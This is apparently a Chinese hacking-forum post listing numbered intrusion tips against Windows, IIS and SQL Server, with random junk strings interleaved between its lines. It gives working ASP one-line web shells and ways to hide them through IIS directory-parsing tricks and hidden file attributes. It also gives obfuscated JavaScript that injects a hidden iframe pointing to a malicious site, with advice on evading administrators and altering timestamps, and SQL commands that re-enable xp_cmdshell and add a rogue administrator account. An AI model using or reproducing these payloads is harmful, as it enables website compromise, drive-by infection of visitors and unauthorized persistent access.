- t; R! v. h/ K# f9 S- t* E& C
51、log备份时的一句话木马:
1 k5 {2 U4 } q
a).<%%25Execute(request("go"))%%25>
$ P$ z9 N, N+ W9 ~
b).<%Execute(request("go"))%>
2 k! J% e: ^7 ?0 y0 S
c).%><%execute request("go")%><%
0 a& `1 W, K5 d) ^
d).<script language=VBScript runat=server>execute request("sb")</Script>
- e! u9 B" g/ I: M- [- _* _
e).<%25Execute(request("l"))%25>
4 {: J6 D7 X j( |9 O' p
f).<%if request("cmd")<>"" then execute request("pass")%>
/ Y% z. D: B `% } P4 s2 h
! ]8 x( a2 _- f2 N r+ c( q
52、at "12:17" /interactive cmd
& q6 I+ A4 j0 w; y5 c' x; ?
执行后可以用AT命令查看新加的任务
) ]$ R, J$ v% s i' s. p! H
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
7 h# L% v& z- s2 E! n
$ v) X; R7 D- w( M- Z; s; b
53、隐藏ASP后门的两种方法
, T* j# ~% F" K# G
1、建立非标准目录:mkdir images..\
7 c' W4 B% B) B8 o& K5 S& S- B
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
* O1 m D2 Y( n T, o/ d" z
通过web访问ASP木马:http://ip/images../news.asp?action=login
! j/ s# ?9 L8 h: P. Y& l6 \% w; t4 M4 R% z$ |
如何删除非标准目录:rmdir images..\ /s
* P) Q& W5 R/ }3 {; S6 D/ [2 K
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
( ~% m% G+ N# z8 `
mkdir programme.asp
5 `, S! q0 `/ V+ {6 P+ K
新建1.txt文件内容:<!--#include file=”12.jpg”-->
$ {. `* n! i6 C/ ?6 V! u
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
( }! }) h9 x% _
attrib +H +S programme.asp
8 |, g& H4 _+ u
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
: k2 c# K- J! \
, C( h B% a, d; `% M% |0 S
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
3 U5 ^7 K7 D2 O8 {, D: {8 E
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
8 [. Z n0 k2 H- U8 c# @: [
! Z, R; D$ ~% B6 ^. }$ [. o
55、JS隐蔽挂马
8 o9 v s9 y% q3 I
1.
9 x+ ^; v0 C) R
var tr4c3="<iframe src=ht";
+ x& d; A* L) J( }/ z( ^. N- z
tr4c3 = tr4c3+"tp:/";
+ p- k( \( z& F, x6 c8 t1 `
tr4c3 = tr4c3+"/ww";
1 Z: i" D. Z! @$ U* a9 l
tr4c3 = tr4c3+"w.tr4";
9 k, a p8 t/ u- p
tr4c3 = tr4c3+"c3.com/inc/m";
5 `; j$ I6 Z2 S/ n" s
tr4c3 = tr4c3+"m.htm style="display:none"></i";
; h% a3 v/ R- [& _8 M
tr4c3 =tr4c3+"frame>'";
3 z# U5 Y/ l9 q. u- q( L
document.write(tr4c3);
) N( W3 G- w A2 U- r, I
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
$ Q% Y: D( O; F1 Z0 j4 F
4 R: V% W; N R5 g/ J3 `- j
2.
& q- X8 `: f4 ~0 ^9 d8 l3 }3 W. R
转换进制,然后用EVAL执行。如
6 u4 n( `8 M( o7 \, e: g+ ?' ^
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
* s8 r, Y' z3 ~8 |1 I Y* G1 t
不过这个有点显眼。
, @. U3 @( J+ B' d" _: Z2 ~
3.
0 l5 O& ?9 N. \/ z! H
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
- ~& ]! z9 w3 ^9 o# `3 c' h
最后一点,别忘了把文件的时间也修改下。
0 q, ]1 o" j7 Y! F7 p
" g: s+ N! P3 ~+ k) g1 S
56.3389终端入侵常用DOS命令
8 S# |/ F+ }& {
taskkill taskkill /PID 1248 /t
, D, h! ^( T4 X6 s5 j# l2 `
" j* Y9 @, m8 x5 u3 W. Y }
tasklist 查进程
" K+ b1 @. e- Y% p, T- N
- Y$ c5 i* z3 s& \- d# m/ w5 J
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
9 \9 `) Y: b2 D
iisreset /reboot
" e, d2 @1 S/ F# T5 k0 K4 I* P
tsshutdn /reboot /delay:1 重起服务器
9 n3 l3 `" l8 {- v; ^6 f
2 G6 q! ~0 W5 b3 [; k; _
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
1 Z9 l# X# S/ c) s0 `; N0 U
& d) L0 `( i, s3 t4 Q$ F6 _8 H
query user 查看当前终端用户在线情况
6 K* p3 l5 W3 Q4 R+ m0 I3 C$ \3 O9 L
( t) _5 x; Q- h& T' x; K
要显示有关所有会话使用的进程的信息,请键入:query process *
~$ `9 ]* @& H$ J6 ^
9 [( l. e8 O, r* r
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
1 @# j/ Q6 `) r" @- }6 z8 j
[ z' f, s8 I/ u6 A
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
$ |( }4 `' n* v
" H: ^0 S) b. |: B0 b
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
. O4 S, P2 U9 R& `, o7 O
& V2 y% A& X) S& h
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
8 M2 a( r4 V- w' i/ {1 T
2 w3 T# }: B! w8 r9 h1 a, v* G
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
/ |. j- \# t; Q) _8 F* U4 H
8 `- b, C0 K8 k: P9 Y+ \) [8 J
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
" ~' t$ G9 W/ K/ I% @$ s/ Y
; V6 ]5 v; g, _, |) Z
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
8 g3 q; f# O u' @
U x1 K& h$ V* u) K) Z+ W
56、在地址栏或按Ctrl+O,输入:
7 k7 D/ T+ ^- ~& \# G/ G: |
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
a: ]5 X. E5 k; v
+ M6 ~9 X. ^- Y5 N. `/ P w
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
7 v7 q5 H# K+ ?- A! y
- Y3 D& `' j7 t2 n
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
+ \. Z0 F% j d
用net localgroup administrators是可以看到管理组下,加了$的用户的。
: T2 o f! E( J7 F' t$ l+ B
3 M6 u# X) @5 i, c Z
58、 sa弱口令相关命令
! Q! N8 B2 Y: E& Y
7 q, S- i/ V3 G1 \. i. @
一.更改sa口令方法:
! i/ t& g1 d# G" F
用sql综合利用工具连接后,执行命令:
2 F% n& s8 p' A3 Z: n9 W* o* W! c1 m$ H
exec sp_password NULL,'20001001','sa'
6 T* u% P/ _% Y' z6 ~% _$ s
(提示:慎用!)
; m* J! |% l6 G. n$ K' e1 {# a
/ y5 }- n% u1 d1 f x
二.简单修补sa弱口令.
8 O, ?$ e( o1 D H5 U$ Y ^
" L- \ a; d& Y
方法1:查询分离器连接后执行:
4 ^9 N5 |" w; j3 c3 ?% r
if exists (select * from
! @, U# |1 S: U, I; D
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
4 s9 Y. b" }8 |1 m1 ^
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
# q+ |/ c4 p" _9 ?$ B0 [8 S
& p' F5 x$ r* O& j
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
' h. ?) I% a( y4 w, Z7 l' N
2 `' K+ ]( O" R8 ?, G
GO
8 @2 Z: }, Y, O4 V0 g* s
6 g3 q/ }" y2 j ?) q. }2 C& A$ w
然后按F5键命令执行完毕
* q( M P' J( [
) p# T" H- Z- ^
方法2:查询分离器连接后
9 E- n0 ^% k. B, n0 H, Y" y
第一步执行:use master
5 o, N1 O; H1 A. K
第二步执行:sp_dropextendedproc 'xp_cmdshell'
% Q8 y; x# P! h0 R7 j# Z
然后按F5键命令执行完毕
7 Z; r* z7 t1 u' s7 g/ _2 l
" F& j4 [& y9 }6 f- p c& I
4 ~7 Z* `+ j/ @( H6 U2 n) I. s
三.常见情况恢复执行xp_cmdshell.
8 u. B6 k6 t, X3 d( ?
& n& I4 B8 A" r% V9 ]
: T# @/ w: ~) z1 e! U" P
1 未能找到存储过程'master..xpcmdshell'.
* V W/ e1 f8 w5 O
恢复方法:查询分离器连接后,
% m8 g+ R/ Q" Z, u+ f; |" N
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
+ _ g+ {/ f/ @( a
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
! {. l$ r4 O$ z% K- @8 R
然后按F5键命令执行完毕
8 ?2 X0 }; _( L# Y4 v8 I
2 v$ w" P6 A6 p, ^; M7 q1 q# Z
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
6 r& d8 x! f( |! X$ R$ M N
恢复方法:查询分离器连接后,
! v0 e# I C p; k3 B
第一步执行:sp_dropextendedproc "xp_cmdshell"
9 R* ?* D# ]/ V; o
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
+ {& \. i V2 c: o4 [; T
然后按F5键命令执行完毕
$ e" @3 U6 y- g' u
; G7 D& l0 x S) n @
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
7 |; D4 V0 I: t6 R
恢复方法:查询分离器连接后,
! e+ g* ~1 `" o/ w S: G1 D$ E0 G
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
' Q8 V0 h! T* Z5 |
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
: i- r" w1 v0 M5 b K: A% a: D
然后按F5键命令执行完毕
& J- f# g: O/ Y" _9 U2 k W
) [1 r5 Z3 _# b2 ?
四.终极方法.
! a: C Y$ @% A; [& F* L
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
9 I# \+ Z% ~( Z6 @; H
查询分离器连接后,
5 C: S0 I/ F* k! ^- T; G
2000servser系统:
* i1 x g' a# Q4 F1 W1 O5 N4 Q
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
2 B9 n3 N5 N' P2 T
! j/ W8 E' Z% a" [% a2 `4 F
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
. T5 g$ c/ f$ G0 r c$ J. z; L
. Q* W7 w! k* o% c9 ?
xp或2003server系统:
. ?9 `0 n7 Y- t6 \
9 w) E X6 V' P- b; a4 Q
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
! v* U+ k, _ H: r, y s2 L
) r' ~4 X2 s# n% F y' Z; u
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
% m# q" Y8 t0 v7 V
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2